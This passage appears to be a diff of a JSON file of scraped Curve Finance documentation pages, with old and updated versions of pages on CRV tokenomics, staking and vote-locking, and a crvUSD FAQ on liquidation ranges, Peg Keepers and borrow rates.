Full release schedule here: https://dao.curve.fi/releaseschedule Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics CRV Tokenomics Table of contents Supply Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Supply Home $CRV Token CRV Tokenomics $CRV officially launched on the 13 th of August 2020. The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. Supply The total supply of 3.03b is distributed as such: 62% to community liquidity providers 30% to shareholders (team and investors) with 2-4 years vesting 3% to employees with 2 years vesting 5% to the community reserve The initial supply of around 1.3b (~43%) is distributed as such: 5% to pre-CRV liquidity providers with 1 year vesting 30% to shareholders (team and investors) with 2-4 years vesting 3% to employees with 2 years vesting 5% to the community reserve The circulating supply will be 0 at launch and the initial release rate will be around 2m CRV per day. Full release schedule here: https://dao.curve.fi/releaseschedule 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Staking your crv", + "title": "Staking your CRV", "html_url": "https://resources.curve.fi/crv-token/staking-your-crv/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Staking your crv Table of contents Staking your $CRV Locking your $CRV Claiming your trading fees How to calculate the APY for staking CRV? 
Further Reading Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Technical Documentation Table of contents Staking your $CRV Locking your $CRV Claiming your trading fees How to calculate the APY for staking CRV? Further Reading Staking your crv Staking your $CRV Starting on the 19 th of September 2020, 50% of all trading fees are distributed to veCRV holders . This is the result of a community-led proposal to align incentives between liquidity providers and governance participants (veCRV holders). Collected fees will be used to buy 3CRV (LP token for 3Pool) and distributed to veCRV holders. This currently represents over $15M in trading fees per year. veCRV stands for vote-escrowed $CRV; it is $CRV vote locked in the Curve DAO. Vote Locking You can also lock $CRV to obtain a boost on your provided liquidity. Boosting your CRV Rewards Video about how to stake $CRV: https://www.youtube.com/watch?v=8GAI1lopEdU Locking your $CRV Once you know how much and how long you wish to lock for, visit the following page: https://dao.curve.fi/locker Enter the amount you want to lock and select your expiry. Remember locking is not reversible. The amount of veCRV received will depend on how much and how long you lock for. You can extend a lock and add $CRV to it at any point but you cannot have $CRV with different expiry dates. Claiming your trading fees Claiming Trading Fees How to calculate the APY for staking CRV? The formula below can help you calculate the daily APY: $$ \\frac{\\text{DailyTradingVolume} \\times 0.0002 \\times 365}{\\text{TotalveCRV} \\times \\text{CRVPrice}} \\times 100 $$ Further Reading https://www.stakingrewards.com/earn/curve-dao-token/ Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Staking your CRV Table of contents Locking your $CRV Claiming your trading fees How to calculate the APY for staking CRV?
Further Reading Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Locking your $CRV Claiming your trading fees How to calculate the APY for staking CRV? Further Reading Home $CRV Token Staking your CRV Starting on the 19 th of September 2020, 50% of all trading fees are distributed to veCRV holders . This is the result of a community-led proposal to align incentives between liquidity providers and governance participants (veCRV holders). Collected fees will be used to buy 3CRV (LP token for 3Pool) and distributed to veCRV holders. This currently represents over $15M in trading fees per year. veCRV stands for vote-escrowed $CRV; it is $CRV vote locked in the Curve DAO. Vote Locking You can also lock $CRV to obtain a boost on your provided liquidity. Boosting your CRV Rewards Video about how to stake $CRV: https://www.youtube.com/watch?v=8GAI1lopEdU Locking your $CRV Once you know how much and how long you wish to lock for, visit the following page: https://dao.curve.fi/locker Enter the amount you want to lock and select your expiry. Remember locking is not reversible. The amount of veCRV received will depend on how much and how long you lock for. You can extend a lock and add $CRV to it at any point but you cannot have $CRV with different expiry dates. Claiming your trading fees Claiming Trading Fees How to calculate the APY for staking CRV?
The formula below can help you calculate the daily APY: $$ \\frac{\\text{DailyTradingVolume} \\times 0.0002 \\times 365}{\\text{TotalveCRV} \\times \\text{CRVPrice}} \\times 100 $$ Further Reading https://www.stakingrewards.com/earn/curve-dao-token/ 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding crv", + "title": "Understanding CRV", "html_url": "https://resources.curve.fi/crv-token/understanding-crv/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Understanding crv Table of contents Understanding $CRV Staking (trading fees) Boosting Voting The CRV Matrix Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Technical Documentation Table of contents Understanding $CRV Staking (trading fees) Boosting Voting The CRV Matrix Understanding crv Understanding $CRV The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. Currently CRV has three main uses: voting, staking and boosting. Those three things will require you to vote lock your CRV and acquire veCRV. veCRV stands for vote-escrowed CRV, it is simply CRV locked for a period of time. The longer you lock CRV for, the more veCRV you receive. Staking (trading fees) CRV can now be staked (locked) to receive trading fees from the Curve protocol. A community-led proposal introduced a 50% admin fee on all trading fees. Those fees are collected and used to buy 3CRV, the LP token for the TriPool, which is then distributed to veCRV holders. Staking your $CRV Calculating Yield Boosting One of the main incentives for CRV is the ability to boost your rewards on provided liquidity. Vote locking CRV allows you to acquire voting power to participate in the DAO and earn a boost of up to 2.5x on the liquidity you are providing on Curve. Boosting your CRV Rewards Voting Once CRV holders vote-lock their CRV for veCRV, they can start voting on various DAO proposals and pool parameters. Proposals The CRV Matrix The table below can help you understand the value add of veCRV.
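Returning to the staking APY formula above: the 0.0002 factor corresponds to veCRV's 50% share of a 0.04% trading fee. A worked example with purely hypothetical inputs ($200m daily volume, 500m total veCRV, CRV at $0.50):

```latex
\[
\frac{200{,}000{,}000 \times 0.0002 \times 365}{500{,}000{,}000 \times 0.50} \times 100
\;=\; \frac{14{,}600{,}000}{250{,}000{,}000} \times 100 \;\approx\; 5.8\%
\]
```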
Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV Understanding CRV Table of contents Staking (trading fees) Boosting Voting The CRV Matrix CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Staking (trading fees) Boosting Voting The CRV Matrix Home $CRV Token Understanding CRV The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. Currently CRV has three main uses: voting, staking and boosting. Those three things will require you to vote lock your CRV and acquire veCRV. veCRV stands for vote-escrowed CRV, it is simply CRV locked for a period of time. The longer you lock CRV for, the more veCRV you receive. Staking (trading fees) CRV can now be staked (locked) to receive trading fees from the Curve protocol. A community-led proposal introduced a 50% admin fee on all trading fees. Those fees are collected and used to buy 3CRV, the LP token for the TriPool, which is then distributed to veCRV holders. Staking your $CRV Calculating Yield Boosting One of the main incentives for CRV is the ability to boost your rewards on provided liquidity. Vote locking CRV allows you to acquire voting power to participate in the DAO and earn a boost of up to 2.5x on the liquidity you are providing on Curve. Boosting your CRV Rewards Voting Once CRV holders vote-lock their CRV for veCRV, they can start voting on various DAO proposals and pool parameters. Proposals The CRV Matrix The table below can help you understand the value add of veCRV. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "FAQ", + "title": "crvUSD FAQ", "html_url": "https://resources.curve.fi/crvusd/faq/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ FAQ Table of contents $crvUSD FAQ General What is $crvUSD and how does it work? How does the $crvUSD liquidation process differ from other debt-based stablecoins?
How is $crvUSD pegged to a price of $1? Can other types of collateral be proposed for crvUSD? How does that process work? Liquidation Process What is my liquidation price? When depositing collateral, how do I adjust and select my collateral deposit price range? What happens when the collateral price drops into my selected range? What happens if the collateral price recovers? Under what circumstances can I be liquidated? How do I maintain my loan health if collateral price drops into my range? What happens to the collateral in the event of hard liquidation? What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? Peg Keepers What are Peg Keepers? Under what circumstances can the Peg Keepers mint or burn $crvUSD? What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? What does it mean if the Peg Keeper's debt is zero? How does Peg Keeper trade and distribute profits? Borrow Rate What is the Borrow Rate? How is the $crvUSD Borrow Rate calculated? Safety and Risks What are the risks of using $crvUSD How can I best manage my risks when providing liquidity or borrowing in crvUSD? Has $crvUSD been audited? Can I see the code? $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents $crvUSD FAQ General What is $crvUSD and how does it work? How does the $crvUSD liquidation process differ from other debt-based stablecoins? How is $crvUSD pegged to a price of $1? Can other types of collateral be proposed for crvUSD? How does that process work? Liquidation Process What is my liquidation price? When depositing collateral, how do I adjust and select my collateral deposit price range? What happens when the collateral price drops into my selected range? What happens if the collateral price recovers? Under what circumstances can I be liquidated? How do I maintain my loan health if collateral price drops into my range? What happens to the collateral in the event of hard liquidation? What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? Peg Keepers What are Peg Keepers? Under what circumstances can the Peg Keepers mint or burn $crvUSD? What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? What does it mean if the Peg Keeper's debt is zero? How does Peg Keeper trade and distribute profits? Borrow Rate What is the Borrow Rate? How is the $crvUSD Borrow Rate calculated? 
Safety and Risks What are the risks of using $crvUSD How can I best manage my risks when providing liquidity or borrowing in crvUSD? Has $crvUSD been audited? Can I see the code? FAQ $crvUSD FAQ General What is $crvUSD and how does it work? $crvUSD refers to a dollar-pegged stablecoin, which may be minted by a decentralized protocol developed by Curve Finance. Users can mint $crvUSD by posting collateral and opening a loan within this protocol. How does the $crvUSD liquidation process differ from other debt-based stablecoins? $crvUSD uses an innovative mechanism to reduce the risk of liquidations. Instead of instantly triggering a liquidation at a specific price, a users collateral is converted into stablecoins across a smooth range of prices. Simulations suggest most price drops would result in the loss of just a few percentage points worth of collateral value, instead of the instant and total loss implemented by the liquidation process common to most debt-based stablecoins. How is $crvUSD pegged to a price of $1? The $crvUSD peg is broadly protected by the fact that the protocol is always overcollateralized. The protocol employs a number of stabilization mechanisms to fine-tune this peg. One mechanism is to automatically adjust borrow rates based on supply and demand. The protocol also relies on Peg Keepers (see below section), which are authorized to burn or mint $crvUSD based on market conditions. Can other types of collateral be proposed for crvUSD? How does that process work? Yes, other collateral markets can be proposed for $crvUSD through governance. Contact the community support channels for additional information on the current process to propose new collateral types. Each approved collateral has its own $crvUSD market. Liquidation Process What is my liquidation price? At the start of the $crvUSD loan process, collateral is deposited and equally distributed over a range of prices rather than one single liquidation price. When the price falls within this range, your collateral begins its conversion into $crvUSD, a process that helps maintain the health of your loan and, in most circumstances, prevents a liquidation. Thus, you do not have one specific liquidation price. When depositing collateral, how do I adjust and select my collateral deposit price range? This price range can optionally be adjusted and customized when initially creating a loan. In the UI, look for the advanced mode toggle which will provide more information on this range as well as an Adjust button that allows you to fine-tune this range. What happens when the collateral price drops into my selected range? Each $crvUSD market is attached to an AMM. When the collateral price drops into your selected range, this collateral can be traded in the AMM. When this happens, traders can purchase your collateral and replace it with $crvUSD. This has the effect of leaving your loan collateralized by stablecoins, which better hold value and maintain your loan health. NOTE: This process was initially referred to as soft liquidation. This term is being phased out to avoid confusion with the harder liquidation process in which a loan is closed and collateral is sold off. What happens if the collateral price recovers? While collateral price rises, the above process happens in reverse. Your position is traded via the AMM from $crvUSD back into your original collateral. 
Due to AMM trading fees, you may find you have lost a few percentage points worth of your original collateral value once the collateral price is again above the top end of your selected liquidation range. Under what circumstances can I be liquidated? Should your loan health drop below 0%, you are eligible to for liquidation. In liquidation, your collateral is sold off and your position closes. While the $crvUSD collateral conversion AMM mechanism aims to protect against liquidations, it may be unable to keep pace with severe price swings. Borrowers are recommended to maintain loan health, particularly when prices drop within the selected liquidation range. How do I maintain my loan health if collateral price drops into my range? Once collateral price drops into your liquidation range, you are not permitted to add new collateral to protect your loan health. With collateral price inside your liquidation range, the only way to increase your loan health is to repay $crvUSD. Even small $crvUSD repayments while collateral price is within your liquidation range can be helpful in preventing a liquidation. What happens to the collateral in the event of hard liquidation? In the event of a hard liquidation, all available collateral is sold off by the AMM system, the debt is covered, and the loan is closed. What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? The 'liquidation discount' is calculated based on the collateral's market value and is designed to incentivize liquidators to participate in the liquidation process. This factor is used to effectively discount the collateral valuation when calculating the health for liquidation purposes. In other protocols, this may be referred to as a liquidation threshold and is often hard-coded instead of calculated dynamically. Peg Keepers What are Peg Keepers? The Peg Keepers are contracts uniquely enabled to mint and absorb debt in $crvUSD for the purposes of trading near the peg. Under what circumstances can the Peg Keepers mint or burn $crvUSD? Each Peg Keeper targets a specific Peg Keeper pool . A Peg Keeper pool is a Curve v1 pool allowing trading between $crvUSD and a blue chip stablecoin. The Peg Keepers are responsible for trying to balance these pools by trading at a profit. The Peg Keepers can only mint $crvUSD to trade into their associated pools when its pool balance of $crvUSD is too low, or it can repurchase and burn the $crvUSD if its pool balance is too high. What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? A Peg Keeper's debt is the amount of $crvUSD it has deposited into a specific pool. Total debt in $crvUSD includes all outstanding $crvUSD that has been borrowed across the system. What does it mean if the Peg Keeper's debt is zero? If a Peg Keeper's debt is zero, it means that the Peg Keeper has no outstanding debt in the $crvUSD system. How does Peg Keeper trade and distribute profits? Every Peg Keeper has a public update function. If the Peg Keeper has accumulated profits, then a portion of these profits are distributed at the behest of the user who calls the update function, in order to incentivize distributed trading in the pools. To access this on Etherscan, you can visit LLAMMA details on the $crvUSD UI within any market. Click the Monetary Policy link to visit Etherscan. On Etherscan, click the Contract tab and the Read Contract tab underneath. Under function 6 (peg_keepers) type the index value of the market you are interested in. 
The index value ranges from 0 to n-1 where n is the number of $crvUSD markets. Click on the link returned, again click Contract and Read Contract to access the function 6 (estimate_caller_profit) to know the minimum tokens you would receive. To call the function, select the Write Contract tab, connect your wallet, and call function 1 (update) Borrow Rate What is the Borrow Rate? The Borrow Rate is the variable interest rate charged on active loans within each collateral market. How is the $crvUSD Borrow Rate calculated? The Borrow Rate for each $crvUSD collateral market is calculated based on a series of parameters, including the Peg Keeper's debt, the total debt, and the market demand for borrowing. Safety and Risks What are the risks of using $crvUSD As with all cryptocurrencies, $crvUSD carries several risks, including depeg risks and risk of liquidation of your collateral. Make sure to read the disclaimer and exercise caution when interacting with smart contracts. How can I best manage my risks when providing liquidity or borrowing in crvUSD? Best risk management practices include maintaining a safe collateralization ratio, understanding the potential for liquidation, and keeping an eye on market conditions. Has $crvUSD been audited? Yes, you may read the full $crvUSD MixByte audit and other audits for Curve may be published to Github . Can I see the code? The code is publicly available on the Curve Github . Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ crvUSD FAQ Table of contents General What is crvUSD and how does it work? How does the crvUSD liquidation process differ from other debt-based stablecoins? How is crvUSD pegged to a price of $1? Can other types of collateral be proposed for crvUSD? How does that process work? Liquidation Process What is my liquidation price? When depositing collateral, how do I adjust and select my collateral deposit price range? What happens when the collateral price drops into my selected range? (soft-liquidation) What happens if the collateral price recovers? (de-liquidation) Under what circumstances can I be liquidated? (hard-liquidation) How do I maintain my loan health if collateral price drops into my range? What happens to the collateral in the event of hard liquidation? What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? Peg Keepers What are Peg Keepers? Under what circumstances can the Peg Keepers mint or burn crvUSD? What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? What does it mean if the Peg Keeper's debt is zero? How does Peg Keeper trade and distribute profits? Borrow Rate What is the Borrow Rate? How is the crvUSD Borrow Rate calculated? Safety and Risks What are the risks of using crvUSD How can I best manage my risks when providing liquidity or borrowing in crvUSD? Has crvUSD been audited? Can I see the code? 
Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents General What is crvUSD and how does it work? How does the crvUSD liquidation process differ from other debt-based stablecoins? How is crvUSD pegged to a price of $1? Can other types of collateral be proposed for crvUSD? How does that process work? Liquidation Process What is my liquidation price? When depositing collateral, how do I adjust and select my collateral deposit price range? What happens when the collateral price drops into my selected range? (soft-liquidation) What happens if the collateral price recovers? (de-liquidation) Under what circumstances can I be liquidated? (hard-liquidation) How do I maintain my loan health if collateral price drops into my range? What happens to the collateral in the event of hard liquidation? What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? Peg Keepers What are Peg Keepers? Under what circumstances can the Peg Keepers mint or burn crvUSD? What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? What does it mean if the Peg Keeper's debt is zero? How does Peg Keeper trade and distribute profits? Borrow Rate What is the Borrow Rate? How is the crvUSD Borrow Rate calculated? Safety and Risks What are the risks of using crvUSD How can I best manage my risks when providing liquidity or borrowing in crvUSD? Has crvUSD been audited? Can I see the code? Home $crvUSD crvUSD FAQ General What is crvUSD and how does it work? crvUSD refers to a dollar-pegged stablecoin, which may be minted by a decentralized protocol developed by Curve Finance. Users can mint crvUSD by posting collateral and opening a loan within this protocol. How does the crvUSD liquidation process differ from other debt-based stablecoins? crvUSD uses an innovative mechanism to reduce the risk of liquidations. Instead of instantly triggering a liquidation at a specific price, a user's collateral is converted into stablecoins across a smooth range of prices. Simulations suggest most price drops would result in the loss of just a few percentage points worth of collateral value, instead of the instant and total loss implemented by the liquidation process common to most debt-based stablecoins. How is crvUSD pegged to a price of $1? The crvUSD peg is broadly protected by the fact that the protocol is always overcollateralized. The protocol employs a number of stabilization mechanisms to fine-tune this peg.
One mechanism is to automatically adjust borrow rates based on supply and demand. The protocol also relies on Peg Keepers (see below section), which are authorized to burn or mint crvUSD based on market conditions. Can other types of collateral be proposed for crvUSD? How does that process work? Yes, other collateral markets can be proposed for crvUSD through governance. Contact the community support channels for additional information on the current process to propose new collateral types. Each approved collateral has its own crvUSD market. Liquidation Process What is my liquidation price? At the start of the crvUSD loan process, collateral is deposited and equally distributed over a range of prices, not just a single liquidation price. Should the price fall within this range, the collateral begins its conversion into crvUSD. This process aids in maintaining the loan's health and, under most conditions, wards off liquidation. As a result, there isn't one specific liquidation price. When depositing collateral, how do I adjust and select my collateral deposit price range? The price range can be optionally adjusted and customized during the initial loan creation process. In the UI, the advanced mode toggle provides further insights into this range. It also presents an Adjust button, enabling users to fine-tune their preferred price range. What happens when the collateral price drops into my selected range? (soft-liquidation) Each crvUSD market is linked to an Automated Market Maker (AMM). If the collateral price falls into the selected range, this collateral becomes tradable in the AMM. At this juncture, traders have the opportunity to acquire the collateral, substituting it with crvUSD. Consequently, the loan becomes collateralized by stablecoins, known for their more reliable value retention, contributing to the sustained health of the loan. What happens if the collateral price recovers? (de-liquidation) As the collateral price increases, the aforementioned process reverses. The position undergoes trading through the AMM, transitioning from crvUSD back to the original form of collateral. Owing to AMM trading fees, it's typical for a slight percentage of the original collateral value to be diminished once the collateral price surpasses the upper limit of the predetermined liquidation range. Under what circumstances can I be liquidated? (hard-liquidation) Should a loan's health drop below 0%, it becomes eligible for liquidation. In this scenario, the collateral is sold off, and the position closes. Although the crvUSD collateral conversion mechanism within the AMM is designed to protect against liquidations, it might not keep up with severe price fluctuations. It is advisable for borrowers to maintain their loan health, especially when prices fall within the selected liquidation range. How do I maintain my loan health if collateral price drops into my range? When the collateral price falls into the liquidation range, adding new collateral to protect loan health is not permitted. Within this liquidation range, loan health can only be improved by repaying crvUSD. Even minimal crvUSD repayments can be effective in preventing liquidation while the collateral price resides within this range. What happens to the collateral in the event of hard liquidation? In the event of a hard liquidation, all available collateral is sold off by the AMM system, the debt is covered, and the loan is closed. What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? 
The 'liquidation discount' is calculated based on the collateral's market value and is designed to incentivize liquidators to participate in the liquidation process. This factor is used to effectively discount the collateral valuation when calculating the health for liquidation purposes. In other protocols, this may be referred to as a liquidation threshold and is often hard-coded instead of calculated dynamically. Peg Keepers What are Peg Keepers? The Peg Keepers are contracts uniquely enabled to mint and absorb debt in crvUSD for the purposes of trading near the peg. Under what circumstances can the Peg Keepers mint or burn crvUSD? Each Peg Keeper targets a specific Peg Keeper pool . A Peg Keeper pool is a Curve v1 pool allowing trading between crvUSD and a blue chip stablecoin. The Peg Keepers are responsible for trying to balance these pools by trading at a profit. A Peg Keeper can only mint crvUSD to trade into its associated pool when the pool's balance of crvUSD is too low, or repurchase and burn crvUSD if the pool's balance is too high. What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? A Peg Keeper's debt is the amount of crvUSD it has deposited into a specific pool. Total debt in crvUSD includes all outstanding crvUSD that has been borrowed across the system. What does it mean if the Peg Keeper's debt is zero? If a Peg Keeper's debt is zero, it means that the Peg Keeper has no outstanding debt in the crvUSD system. How does Peg Keeper trade and distribute profits? Every Peg Keeper has a public update function. If the Peg Keeper has accumulated profits, then a portion of these profits are distributed at the behest of the user who calls the update function, in order to incentivize distributed trading in the pools. To access this information on Etherscan, one can visit the LLAMMA details on the crvUSD UI within any market. By clicking the Monetary Policy link, users are directed to Etherscan. There, under the Contract tab, they should select the Read Contract tab. Function 6 (peg_keepers) requires the index value of the market of interest, ranging from 0 to n-1, where n represents the number of crvUSD markets. After entering this index and clicking on the returned link, users should repeat the process by selecting Contract and Read Contract. This time, they access function 6 (estimate_caller_profit) to understand the minimum tokens receivable. For function execution, the Write Contract tab must be selected, a wallet connected, and function 1 (update) called. Borrow Rate What is the Borrow Rate? The Borrow Rate is the variable interest rate charged on active loans within each collateral market. How is the crvUSD Borrow Rate calculated? The Borrow Rate for each crvUSD collateral market is calculated based on a series of parameters, including the Peg Keeper's debt, the total debt, and the market demand for borrowing. Safety and Risks What are the risks of using crvUSD? As with all cryptocurrencies, crvUSD carries several risks, including depeg risks and risk of liquidation of a user's collateral. Make sure to read the disclaimer and exercise caution when interacting with smart contracts. How can I best manage my risks when providing liquidity or borrowing in crvUSD? Best risk management practices include maintaining a safe collateralization ratio, understanding the potential for liquidation, and keeping an eye on market conditions. Has crvUSD been audited?
Yes, please read the full crvUSD MixByte audit; other audits for Curve may be published to Github . Can I see the code? The code is publicly available on the Curve Github . 2023-10-18 Back to top", "labels": [ "Documentation" ] }, { - "title": "Loan creation", + "title": "Loan Creation & Management", "html_url": "https://resources.curve.fi/crvusd/loan-creation/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan creation Table of contents Loan Creation Leveraging Loans Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps 